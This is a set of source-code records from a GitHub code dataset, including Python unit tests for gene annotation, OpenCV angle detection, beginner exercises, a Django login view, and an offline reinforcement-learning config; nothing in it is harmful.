\"sctg_0080_0020\\tmaker\\tCDS\\t4092\\t4332\\t.\\t+\\t2\\tID=foo2;Parent=bar7\\n\"\n expected3 = \"sctg_0080_0020\\tmaker\\tCDS\\t4399\\t5185\\t.\\t+\\t1\\tID=foo3;Parent=bar7\\n\"\n expected4 = \"sctg_0080_0020\\tmaker\\tCDS\\t5249\\t6565\\t.\\t+\\t0\\tID=foo4;Parent=bar7\\n\"\n expected5 = \"sctg_0080_0020\\tmaker\\tCDS\\t6630\\t7436\\t.\\t+\\t0\\tID=foo5;Parent=bar7\\n\"\n expected = expected1 + expected2 + expected3 + expected4 + expected5\n actual = test_cds2.to_gff(seq_name=\"sctg_0080_0020\", source=\"maker\")\n self.assertEquals(expected, actual)\n\n def test_to_tbl_positive_complete(self):\n expected = 
\"3734\\t4034\\tCDS\\n\"\n expected += \"4092\\t4332\\n\"\n expected += \"4399\\t5185\\n\"\n expected += \"5249\\t6565\\n\"\n expected += \"6630\\t7436\\n\"\n expected += \"\\t\\t\\tcodon_start\\t2\\n\"\n self.test_cds1.phase[0] = 1\n self.assertEquals(self.test_cds1.to_tbl(True, True), expected)\n\n def test_to_tbl_negative_complete(self):\n expected = \"7436\\t6630\\tCDS\\n\"\n expected += \"6565\\t5249\\n\"\n expected += \"5185\\t4399\\n\"\n expected += \"4332\\t4092\\n\"\n expected += \"4034\\t3734\\n\"\n expected += \"\\t\\t\\tcodon_start\\t1\\n\"\n self.test_cds1.strand = '-'\n self.assertEquals(self.test_cds1.to_tbl(True, True), expected)\n\n def test_to_tbl_negative_no_start_no_stop(self):\n expected = \"<7436\\t6630\\tCDS\\n\"\n expected += \"6565\\t5249\\n\"\n expected += \"5185\\t4399\\n\"\n expected += \"4332\\t4092\\n\"\n expected += \"4034\\t>3734\\n\"\n expected += \"\\t\\t\\tcodon_start\\t2\\n\"\n # shouldn't look at phase[0] for negative strand!\n self.test_cds1.phase[0] = 2 # should ignore this.\n self.test_cds1.phase[4] = 1\n self.test_cds1.strand = '-'\n self.assertEquals(self.test_cds1.to_tbl(False, False), expected)\n\n\n##########################\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestCDS))\n return suite\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"desiro/gffDB","sub_path":"GAG/test/cds_tests.py","file_name":"cds_tests.py","file_ext":"py","file_size_in_byte":8297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11893737416","text":"###############################################################################\n## Author: Team Supply Bot\n## Edition: eYRC 2019-20\n## Instructions: Do Not modify the basic skeletal structure of given APIs!!!\n###############################################################################\n\n\n######################\n## Essential libraries\n######################\nimport cv2\nimport numpy as np\nimport os\nimport math\nimport csv\n\n########################################################################\n## using os to generalise Input-Output\n########################################################################\ncodes_folder_path = os.path.abspath('.')\nimages_folder_path = os.path.abspath(os.path.join('..', 'Images'))\ngenerated_folder_path = os.path.abspath(os.path.join('..', 'Generated'))\n\n\n############################################\n## Build your algorithm in this function\n## ip_image: is the array of the input image\n## imshow helps you view that you have loaded\n## the corresponding image\n############################################\n\ndef findDist(c1, c2):\n return math.sqrt((c2[0] - c1[0]) ** 2 + (c2[1] - c1[1]) ** 2)\n\n\ndef process(ip_image):\n angle = 0.00\n ip_image[:, :, 0] = 255\n ip_image[:, :, 1] = 255\n\n # Convert to Grayscale\n grIm = cv2.cvtColor(ip_image, cv2.COLOR_BGR2GRAY)\n\n # Find binary image of green and red dot\n # Green at 185, Red at 230\n ret, binImgR = cv2.threshold(grIm, 230, 255, cv2.THRESH_BINARY)\n ret, binImgG = cv2.threshold(grIm, 185, 255, cv2.THRESH_BINARY)\n\n # Apply Gaussian Blur\n gusBlurR = cv2.GaussianBlur(binImgR, (5, 5), 0)\n gusBlurG = cv2.GaussianBlur(binImgG, (5, 5), 0)\n\n # Find Contours of Red and Green\n (contR, hieR) = cv2.findContours(gusBlurR, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # Red contour contains Centre circle and the Red Dot\n contRed, contCentre = contR[2], contR[3] # Smallest(Red Dot), and Bigger than the Smallest(Centre 
Circle)\n if len(contRed) > len(contCentre):\n contCentre, contRed = contRed, contCentre\n\n (contG, hieG) = cv2.findContours(gusBlurG, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # print(\"Sizes : R- \", len(contR), \" G- \", len(contG))\n\n # Just to draw the contours.\n cv2.drawContours(ip_image, contR, -1, (0, 0, 0), 2)\n cv2.drawContours(ip_image, contG, -1, (0, 0, 0), 2)\n\n # Find the Top-Left coordinates of each of circle's bounding rectangle.\n (xC, yC, widCentre, heiCentre) = cv2.boundingRect(contCentre) # Red's third Contour is the circle in centre..\n\n (xR, yR, widR, heiR) = cv2.boundingRect(contRed) # ..it's last(fourth) contour is the Red dot.\n (xG, yG, widG, heiG) = cv2.boundingRect(contG[1]) # Green's second contour is Green dot.\n\n # Draw lines from Centre to Red Dot, Green Dot.\n cv2.line(ip_image, (xC + widCentre // 2, yC + heiCentre // 2), (xR + widR // 2, yR + heiR // 2), (0, 0, 0), 2)\n cv2.line(ip_image, (xC + widCentre // 2, yC + heiCentre // 2), (xG + widG // 2, yG + heiG // 2), (0, 0, 0), 2)\n\n # Find the distance between each point, find the angle at Centre Circle's mid points, and convert the obtained\n # angle to degree.\n # Law of Cosines is used.\n coords = [(xC + widCentre / 2, yC + heiCentre / 2), (xR + widR / 2, yR + heiR / 2), (xG + widG / 2, yG + heiG / 2)]\n disCR = findDist(coords[0], coords[1])\n disCG = findDist(coords[0], coords[2])\n disRG = findDist(coords[1], coords[2])\n angle = np.rad2deg(np.arccos([((disCG ** 2) + (disCR ** 2) - (disRG ** 2)) / (2 * disCG * disCR)])[0])\n\n # Show the final image, with lines, and Contours\n cv2.imshow(\"window\", ip_image)\n cv2.waitKey(0)\n\n # Return angle upto 2 decimal place\n return round(angle, 2)\n\n\n####################################################################\n## The main program which provides read in input of one image at a\n## time to process function in which you will code your generalized\n## output computing code\n## Do not modify this code!!!\n####################################################################\ndef main():\n ################################################################\n ## variable declarations\n ################################################################\n i = 1\n line = []\n ## Reading 1 image at a time from the Images folder\n for image_name in os.listdir(images_folder_path):\n ## verifying name of image\n print(image_name)\n ## reading in image\n ip_image = cv2.imread(images_folder_path + \"/\" + image_name)\n ## verifying image has content\n print(ip_image.shape)\n ## passing read in image to process function\n A = process(ip_image)\n ## saving the output in a list variable\n line.append([str(i), image_name, str(A)])\n ## incrementing counter variable\n i += 1\n ## verifying all data\n print(line)\n ## writing to angles.csv in Generated folder without spaces\n with open(generated_folder_path + \"/\" + 'angles.csv', 'w', newline='') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerows(line)\n ## closing csv file\n writeFile.close()\n\n\n############################################################################################\n## main function\n############################################################################################\nif __name__ == '__main__':\n main()\n","repo_name":"gaurav-12/open_cv_eyantra","sub_path":"Eyantra Task 1/Task1.1/Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} 
+{"seq_id":"9896955791","text":"from vars import xlsx_columns\nfrom functions.exitScript import exitScript\n\ndef getAssets(journal):\n print(\"Extracting list of assets...\")\n assets_list = []\n try:\n for wallet in journal:\n for i in {xlsx_columns[\"token1\"], xlsx_columns[\"token2\"], xlsx_columns[\"tokenfee\"]}:\n assets_list += journal[wallet][i].unique().tolist()\n except Exception as e:\n print(e)\n print(f\"ERROR: Couldn't extract list of tokens\")\n exitScript(2)\n \n # I need only the unique values, use the filter to remove nan\n assets_list_unique = set(filter(lambda x: x == x , assets_list))\n\n print(f\"Assets detected: {assets_list_unique}\")\n\n return assets_list_unique","repo_name":"fabimass/crypto-journal","sub_path":"functions/getAssets.py","file_name":"getAssets.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6181511655","text":"#Jordan Russell\r\n#21/09/14\r\n#R+R Assignment IF statements.\r\n\r\nimport time\r\n\r\nage = int(input(\"Please input your age: \"))\r\n\r\nyears_until_retirement = (65 - age)\r\n\r\nif (age < 18):\r\n print(\"You are not old enough to vote.\")\r\n \r\nelse:\r\n if (age >= 18 - 65):\r\n print(\"You are old enough to vote, and you can retire in {0} years.\".format(years_until_retirement))\r\n\r\n else:\r\n if (age >= 65):\r\n print(\"You are old enough to vote and you can retire now.\")\r\n\r\n\r\n","repo_name":"JordanRussell3030/Variables","sub_path":"IF statements R+R.py","file_name":"IF statements R+R.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14487265945","text":"n = input(\"Enter count for numbers: \")\nn = int(n)\n\nsum = 0\ncount = 1\nnumbers = []\n\nwhile count <= n:\n number = input(\"Enter number: \")\n number = int(number)\n numbers += [number]\n count += 1\n\nfor i in numbers:\n sum += i\n\nprint(\"Sum is %s\" % sum)\n","repo_name":"sivilov-d/HackBulgaria","sub_path":"week2/2-List-Problems/sum_numbers.py","file_name":"sum_numbers.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72841478001","text":"# import necessary libraries\nfrom avalanche.benchmarks import datasets\n# from avalanche.benchmarks.generators import nc_scenario_from_tensor_lists\nfrom avalanche.benchmarks.generators import nc_benchmark\n# from avalanche.training.strategies import GEM\nfrom avalanche.training import GEM\nfrom avalanche.models import SimpleMLP\nfrom avalanche.logging import TextLogger\nfrom avalanche.evaluation.metrics import Accuracy\n\n# generate the dataset\ndata = [[1, 2, 0], [2, 3, 1], [3, 4, 0], [4, 5, 1], [5, 6, 0]]\n\n# create the scenario\nscenario = nc_benchmark(\n train_data=data[:3],\n test_data=data[3:],\n task_labels=[0, 0, 0, 1, 1],\n)\n\n# initialize the model\nmodel = SimpleMLP(input_size=3, num_classes=2)\n\n# create the strategy\nstrategy = GEM(model, memory_size=1000, train_epochs=1, batch_size=256, \n optimizer='adam', lr=0.001, \n lam=0.5, alpha=0.5, use_replay=True)\n\n# create the logger\nlogger = TextLogger(open('log.txt', 'w'))\n\n# create the metric\nmetric = Accuracy()\n\n# train and evaluate the model on the dataset\nfor i, train_task in enumerate(scenario.train_stream):\n # train the model on the current task\n strategy.train(train_task, logger=logger)\n\n # evaluate the model on all tasks so far\n for 
j, test_task in enumerate(scenario.test_stream[:i+1]):\n results = strategy.eval(test_task, metrics=metric)\n print(f\"Accuracy on test task {j+1}: {results[metric]:.4f}\")\n","repo_name":"xoyeon/FDS","sub_path":"unsupervised_CL.py","file_name":"unsupervised_CL.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40834785754","text":"import itertools\nimport os\n\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport DBhandler\nimport random\n\n\n\n\nfrom sklearn.preprocessing import MultiLabelBinarizer, LabelEncoder\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.metrics import confusion_matrix\n\nfrom tensorflow import keras\n#from keras.models import Sequential\n#from keras.layers import Dense, Activation, Dropout\n#from keras.preprocessing import text, sequence\n#from keras import utils\n\n# This code was tested with TensorFlow v1.4\n#print(\"You have TensorFlow version\", tf.__version__)\nclass MultipleOutputModel:\n def trainModel(self):\n db = DBhandler.DBHandler()\n training, test = db.loadAdvertDataMulti()\n train_data, train_label, test_data, test_label = [], [], [], []\n y_train, y_test =[], []\n num_classes_array = []\n\n for x in training:\n #convert = x.numberFormat_body.split(' ')\n #train_data.append(convert)\n train_data.append(x.searchable_body)\n\n train_label.append(x.kompetence)\n for x in test:\n #convert = x.numberFormat_body.split(' ')\n #test_data.append(convert)\n #searchable_body\n test_data.append(x.searchable_body)\n test_label.append(x.kompetence)\n\n max_words = 10000\n tokenize = keras.preprocessing.text.Tokenizer(num_words=max_words, char_level=False)\n\n tokenize.fit_on_texts(train_data) # only fit on train\n #print(tokenize.word_index)\n x_train = tokenize.texts_to_matrix(train_data)\n x_test = tokenize.texts_to_matrix(test_data)\n #print(train_label)\n\n # Use sklearn utility to convert label strings to numbered index\n #encoder = LabelEncoder()\n #for x in train_label:\n # encoder.fit(x)\n # y_train.append(encoder.transform(x))\n #for x in test_label:\n # y_test.append(encoder.transform(x))\n # #y_train = encoder.transform(train_label)\n # #y_test = encoder.transform(test_label)\n\n\n #encoder.fit(train_label)\n\n\n df = pd.DataFrame(train_label)\n #df.drop(index='NONE')\n encoder = LabelEncoder()\n encoder.fit(df)\n y_train = encoder.transform(df)\n y_test = encoder.transform(test_label)\n print(\"Shape of y: \" + str(list(df.iloc[0])))\n #print(\"Shape of y_train: \" + str(set(y_train.iloc[500])))\n\n\n #v = DictVectorizer(sparse=False)\n #v.fit(train_label)\n #y_train = v.transform(train_label)\n #y_test = v.transform(test_label)\n\n #print('Number of classes: ', y_train)\n\n\n # Converts the labels to a one-hot representation\n #num_classes_array = set(list(itertools.chain.from_iterable(y_train)))\n\n #num_classes_array = list(itertools.chain.from_iterable(y_train))\n #print(len(num_classes_array))\n num_classes = np.max(y_train) + 1\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n # Inspect the dimenstions of our training and test data (this is helpful to debug)\n print('x_train shape:', x_train.shape)\n print('x_test shape:', x_test.shape)\n print('y_train shape:', y_train.shape)\n print('y_test shape:', y_test.shape)\n print(\"Train data lenght: \" + str(len(x_train)))\n 
test=[]\n for x in y_train:\n test.extend(x)\n print(\"Train label lenght: \" + str(len(test)))\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(3, input_shape=(max_words,), activation=tf.nn.relu))\n #model.add(Activation('relu'))\n model.add(keras.layers.Dense(12, activation=tf.nn.relu))\n model.add(keras.layers.Dropout(0.5))\n model.add(keras.layers.Dense(num_classes, activation=tf.nn.softmax))\n #model.add(Activation('softmax'))\n\n #model.compile(loss='categorical_crossentropy',\n # optimizer='adam',\n # metrics=['accuracy'])\n\n model.compile(optimizer=tf.train.AdamOptimizer(), \n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n checkpoint_path = \"training_1/cp.ckpt\"\n checkpoint_dir = os.path.dirname(checkpoint_path)\n\n # Create checkpoint callback\n cp_callback = tf.keras.callbacks.ModelCheckpoint(checkpoint_path, \n save_weights_only=True,\n verbose=1)\n\n history = model.fit(x_train, y_train,\n epochs=3,\n verbose=1,\n validation_split=0.1,\n callbacks = [cp_callback])\n\n\n score = model.evaluate(x_test, y_test, verbose=1)\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n # Here's how to generate a prediction on individual examples\n text_labels = encoder.classes_ \n #x_test_random = random.shuffle(x_test)\n\n for i in range(100):\n prediction = model.predict(np.array([x_test[i]]))\n predicted_label = text_labels[np.argmax(prediction)]\n #print(test_data[i][:50] + \"...\")\n print('Actual label:' + str(test_label[i]))\n print(\"Predicted label: \" + predicted_label + \"\\n\")\n\n y_softmax = model.predict(x_test)\n\n y_test_1d = []\n y_pred_1d = []\n\n for i in range(len(y_test)):\n probs = y_test[i]\n index_arr = np.nonzero(probs)\n one_hot_index = index_arr[0].item(0)\n y_test_1d.append(one_hot_index)\n\n for i in range(0, len(y_softmax)):\n probs = y_softmax[i]\n predicted_index = np.argmax(probs)\n y_pred_1d.append(predicted_index)\n","repo_name":"Research-and-Innovation-EAAA/CompetenceMachineLearning","sub_path":"CompetenceMachineLearning/CompetenceMachineLearning/MultipleOutputModel.py","file_name":"MultipleOutputModel.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7268672463","text":"#!/usr/bin/env python3\n\nimport json\nimport sys\nimport random\n\n\n\n\ndef get_random_state():\n number = random.randint(0, 100)\n if number < 40:\n return 0\n if number < 60:\n return 1\n if number < 80:\n return 2\n if number <= 90:\n return 3\n if number <= 100:\n return 4\n\n\ndef randomize_actions(data):\n actions = data['actions']\n count = 0\n state = get_random_state()\n\n# 0 is normal, no change\n# 1 is 0 - 50\n# 2 is 50 - 100\n# 3 is 60 - 80\n# 4 is 70 - 100\n\n for i, action in enumerate(actions):\n if count == 20:\n count = 0\n state = get_random_state()\n \n if state == 0:\n count += 1\n continue\n\n if state == 1 and action['pos'] >= 90:\n count += 1\n action['pos'] = 60\n actions[i] = action\n continue\n\n if state == 2 and action['pos'] <= 10:\n count += 1\n action['pos'] = 40\n actions[i] = action\n continue\n\n if state == 3 and action['pos'] >= 90:\n count += 1\n action['pos'] = 80\n actions[i] = action\n continue\n\n if state == 3 and action['pos'] <= 10:\n count += 1\n action['pos'] = 40\n actions[i] = action\n continue\n\n if state == 4 and action['pos'] <= 10:\n count += 1\n action['pos'] = 70\n actions[i] = action\n continue\n\n if state == 4 and action['pos'] >= 90:\n count += 1\n action['pos'] = 100\n 
actions[i] = action\n continue\n\n return actions\n\n\ndef read_funscript(file_path):\n data = {}\n with open(file_path, 'r') as f:\n data = json.load(f)\n data['actions'] = randomize_actions(data)\n\n with open(f'newfs.funscript', 'w') as f:\n f.write(json.dumps(data))\n\n\ndef main(args):\n read_funscript(args[1])\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"KevynKelso/scripts","sub_path":"bin/sync_mod_fscript.py","file_name":"sync_mod_fscript.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6106089437","text":"# 1 ~ 6 개의 줄\n# 줄마다 P 개의 프렛으로 나누어져 있음\n# 프렛의 번호도 1 ~ P\n# 한 번 누르거나 떼는 것을 손가락을 한 번 움직였다고 한다.\n# 손가락의 가장 적게 움직이는 회수를 구하기\n#\n# 음의 수 N과 한 줄에 있는 프렛의 수 P가 주어진다.\n# (1 ≤ N ≤ 500,000, 2 ≤ P ≤ 300,000)\n\nimport sys\n\ninput = sys.stdin.readline\n\n# N 줄에 해당하는 배열 각 인덱스에 스택을 쌓아\n# 스택 맨 위 숫자보다 큰 게 들어오면 그대로 쌓고\n# 작은 게 들어오면 들어온 수가 제일 클 때까지 pop 후 스택에 저장\n\nN, P = map(int, input().split())\n\n# 최대 6개 1~6 인덱스\nstk = [[] for _ in range(7)]\ncnt = 0\n# print(stk)\n\nfor _ in range(N):\n n, p = map(int, input().split())\n while stk[n] and stk[n][-1] > p:\n stk[n].pop()\n cnt += 1\n if not stk[n] or stk[n][-1] < p:\n stk[n].append(p)\n cnt += 1\n elif stk[n] and stk[n][-1] == p:\n continue\n\n\nprint(cnt)\n","repo_name":"TwOneZero/algorithm-study-note","sub_path":"PS_Study_문제풀이/중요문제풀기/2841re.py","file_name":"2841re.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12672123887","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import View\n\nfrom . import forms\n\n\nclass LoginPage(View):\n form_class = forms.LoginForm\n template_name = 'authentication/login.html'\n\n def get(self, request):\n form = self.form_class()\n\n return render(\n request, self.template_name, context={'form': form}\n )\n\n def post(self, request):\n form = self.form_class(request.POST)\n message = ''\n\n if form.is_valid():\n user = authenticate(\n username=form.cleaned_data['username'],\n password=form.cleaned_data['password'],\n )\n if user is not None:\n login(request, user)\n return redirect('feed')\n else:\n message = 'Identifications invalides'\n return render(\n request, self.template_name, context={\n 'form': form,\n 'message': message,\n }\n )\n\n\nclass SignUpPage(View):\n form_class = forms.SignUpForm\n template_name = 'authentication/signup.html'\n\n def get(self, request):\n form = self.form_class()\n return render(request, self.template_name, context={'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n print(request.POST)\n\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('feed')\n\n return render(request, self.template_name, context={'form': form})\n\n\ndef logout_user(request):\n logout(request)\n return redirect('login')\n","repo_name":"johnchem/OCProjet_LITReview","sub_path":"litreview/authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23992163133","text":"\"\"\"AI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. 
Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n # path for each model separately\n path('predict/api/', predict_request, name='predict_request'),\n path('predict/', predict, name='predict'),\n #\n path('predict_MobileNet/api/', predict_MobileNet_request,\n name='predict_MobileNet_request'),\n path('predict_MobileNet/', predict_MobileNet, name='predict_MobileNet'),\n path('predict_InceptionResNetV2/api/', predict_InceptionResNetV2_request,\n name='predict_InceptionResNetV2_request'),\n path('predict_InceptionResNetV2/', predict_InceptionResNetV2, name='predict_InceptionResNetV2'),\n ##\n path('predict_MobileNetV2/api/', predict_MobileNetV2_request, name='predict_MobileNetV2_request'),\n path('predict_MobileNetV2/', predict_MobileNetV2, name='predict_MobileNetV2'),\n path('predict_Xception/api/', predict_Xception_request,\n name='predict_Xception_request'),\n path('predict_Xception/', predict_Xception, name='predict_Xception'),\n #\n path('predict_VGG16/api/', predict_VGG16_request,\n name='predict_VGG16_request'),\n path('predict_VGG16/', predict_VGG16, name='predict_VGG16'),\n ##\n path('predict_VGG19/api/', predict_VGG19_request,\n name='predict_VGG19_request'),\n path('predict_VGG19/', predict_VGG19, name='predict_VGG19'),\n\n path('predict_DenseNet121/api/', predict_DenseNet121_request,\n name='predict_DenseNet121_request'),\n path('predict_DenseNet121/', predict_DenseNet121, name='predict_DenseNet121'),\n path('predict_DenseNet169/api/', predict_DenseNet169_request,\n name='predict_DenseNet169_request'),\n path('predict_DenseNet169/', predict_DenseNet169, name='predict_DenseNet169'),\n path('predict_DenseNet201/api/', predict_DenseNet201_request,\n name='predict_DenseNet201_request'),\n path('predict_DenseNet201/', predict_DenseNet201, name='predict_DenseNet201'),\n\n path('predict_InceptionV3/api/', predict_InceptionV3_request,\n name='predict_InceptionV3_request'),\n path('predict_InceptionV3/', predict_InceptionV3, name='predict_InceptionV3'),\n path('predict_NASNetMobile/api/', predict_NASNetMobile_request,\n name='predict_NASNetMobile_request'),\n path('predict_NASNetMobile/', predict_NASNetMobile, name='predict_NASNetMobile'),\n path('predict_NASNetLarge/api/', predict_NASNetLarge_request,\n name='predict_NASNetLarge_request'),\n path('predict_NASNetLarge/', predict_NASNetLarge, name='predict_NASNetLarge'),\n]","repo_name":"nature1995/AI-Image-classifiers-on-Django-with-RESTAPI","sub_path":"apps/identification/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"75"} +{"seq_id":"19548799464","text":"import sys\nfrom os import path\nif path.exists('input.txt'):\n sys.stdin = open(\"input.txt\", \"r\")\n\nn,m = map(int, input().split())\ntrees=list(map(int,input().split()))\n\n\n\ndef treecut(h):\n total=0\n for tree in trees:\n if tree>h:\n total+=tree-h\n return total\n\nstart=1\nend=max(trees)\nwhile start<=end:\n mid=(start+end)//2\n\n total=treecut(mid)\n if total>=m:\n start=mid+1\n\n else:\n 
end=mid-1\nprint(end)\n","repo_name":"seok9924/PythonCodingTest","sub_path":"BoJ/class2/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29553095072","text":"from collections import namedtuple\nfrom typing import Iterable, Optional\n\nfrom animanager.files import AnimeFiles\nfrom animanager.sqlite import upsert\n\nfrom .status import cache_status, get_complete\n\nPriorityRule = namedtuple(\n 'PriorityRule',\n ['id', 'regexp', 'priority'])\n\n\ndef get_priority_rules(db) -> Iterable[PriorityRule]:\n \"\"\"Get file priority rules.\"\"\"\n cur = db.cursor()\n cur.execute('SELECT id, regexp, priority FROM file_priority')\n for row in cur:\n yield PriorityRule(*row)\n\n\ndef add_priority_rule(\n db, regexp: str, priority: Optional[int] = None,\n) -> int:\n \"\"\"Add a file priority rule.\"\"\"\n with db:\n cur = db.cursor()\n if priority is None:\n cur.execute('SELECT MAX(priority) FROM file_priority')\n highest_priority = cur.fetchone()[0]\n if highest_priority is None:\n priority = 1\n else:\n priority = highest_priority + 1\n cur.execute(\"\"\"\n INSERT INTO file_priority (regexp, priority)\n VALUES (?, ?)\"\"\", (regexp, priority))\n row_id = db.last_insert_rowid()\n return row_id\n\n\ndef delete_priority_rule(db, rule_id: int) -> None:\n \"\"\"Delete a file priority rule.\"\"\"\n with db:\n cur = db.cursor()\n cur.execute('DELETE FROM file_priority WHERE id=?', (rule_id,))\n\n\ndef cache_files(db, aid: int, anime_files: AnimeFiles) -> None:\n \"\"\"Cache files for anime.\"\"\"\n with db:\n cache_status(db, aid)\n db.cursor().execute(\n \"\"\"UPDATE cache_anime\n SET anime_files=?\n WHERE aid=?\"\"\",\n (anime_files.to_json(), aid))\n\n\ndef get_files(conn, aid: int) -> AnimeFiles:\n \"\"\"Get cached files for anime.\"\"\"\n with conn:\n cur = conn.cursor().execute(\n 'SELECT anime_files FROM cache_anime WHERE aid=?',\n (aid,))\n row = cur.fetchone()\n if row is None:\n raise ValueError('No cached files')\n return AnimeFiles.from_json(row[0])\n\n\ndef set_regexp(db, aid, regexp):\n \"\"\"Set watching regexp for anime.\"\"\"\n upsert(db, 'watching', ['aid'], {'aid': aid, 'regexp': regexp})\n\n\ndef delete_regexp(db, aid):\n \"\"\"Delete watching regexp for anime.\"\"\"\n db.cursor().execute(\n \"\"\"DELETE FROM watching WHERE aid=?\"\"\",\n (aid,))\n\n\ndef delete_regexp_complete(db):\n \"\"\"Delete watching regexp for complete anime.\"\"\"\n db.cursor().executemany(\n \"\"\"DELETE FROM watching WHERE aid=?\"\"\",\n ((aid,) for aid in get_complete(db)))\n","repo_name":"darkfeline/animanager","sub_path":"animanager/db/query/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"8861983675","text":"from dataclasses import dataclass\nfrom typing import Any, Dict, List, Optional, Union\n\nimport gym\nimport numpy as np\n\nimport nnabla as nn\nimport nnabla.functions as NF\nimport nnabla.solvers as NS\nimport nnabla_rl.functions as RF\nimport nnabla_rl.model_trainers as MT\nfrom nnabla_rl.algorithm import Algorithm, AlgorithmConfig, eval_api\nfrom nnabla_rl.algorithms.common_utils import has_batch_dimension\nfrom nnabla_rl.builders import ModelBuilder, SolverBuilder\nfrom nnabla_rl.environments.environment_info import EnvironmentInfo\nfrom nnabla_rl.model_trainers.model_trainer import ModelTrainer, TrainingBatch\nfrom nnabla_rl.models 
import (BEARPolicy, DeterministicPolicy, QFunction, StochasticPolicy, TD3QFunction,\n UnsquashedVariationalAutoEncoder, VariationalAutoEncoder)\nfrom nnabla_rl.utils import context\nfrom nnabla_rl.utils.data import add_batch_dimension, marshal_experiences, set_data_to_variable\nfrom nnabla_rl.utils.misc import create_variable, sync_model\n\n\n@dataclass\nclass BEARConfig(AlgorithmConfig):\n \"\"\"BEARConfig List of configurations for BEAR algorithm.\n\n Args:\n gamma (float): discount factor of rewards. Defaults to 0.99.\n learning_rate (float): learning rate which is set to all solvers. \\\n You can customize/override the learning rate for each solver by implementing the \\\n (:py:class:`SolverBuilder `) by yourself. \\\n Defaults to 0.001.\n batch_size (int): training batch size. Defaults to 100.\n tau (float): target network's parameter update coefficient. Defaults to 0.005.\n lmb (float): weight :math:`\\\\lambda` used for balancing the ratio between :math:`\\\\min{Q}` and :math:`\\\\max{Q}`\\\n on target q value generation (i.e. :math:`\\\\lambda\\\\min{Q} + (1 - \\\\lambda)\\\\max{Q}`).\\\n Defaults to 0.75.\n epsilon (float): inequality constraint of dual gradient descent. Defaults to 0.05.\n num_q_ensembles (int): number of q ensembles . Defaults to 2.\n num_mmd_actions (int): number of actions to sample for computing maximum mean discrepancy (MMD). Defaults to 5.\n num_action_samples (int): number of actions to sample for computing target q values. Defaults to 10.\n mmd_type (str): kernel type used for MMD computation. laplacian or gaussian is supported. Defaults to gaussian.\n mmd_sigma (float): parameter used for adjusting the MMD. Defaults to 20.0.\n initial_lagrange_multiplier (float, optional): Initial value of lagrange multiplier. \\\n If not specified, random value sampled from normal distribution will be used instead.\n fix_lagrange_multiplier (bool): Either to fix the lagrange multiplier or not. Defaults to False.\n warmup_iterations (int): Number of iterations until start updating the policy. 
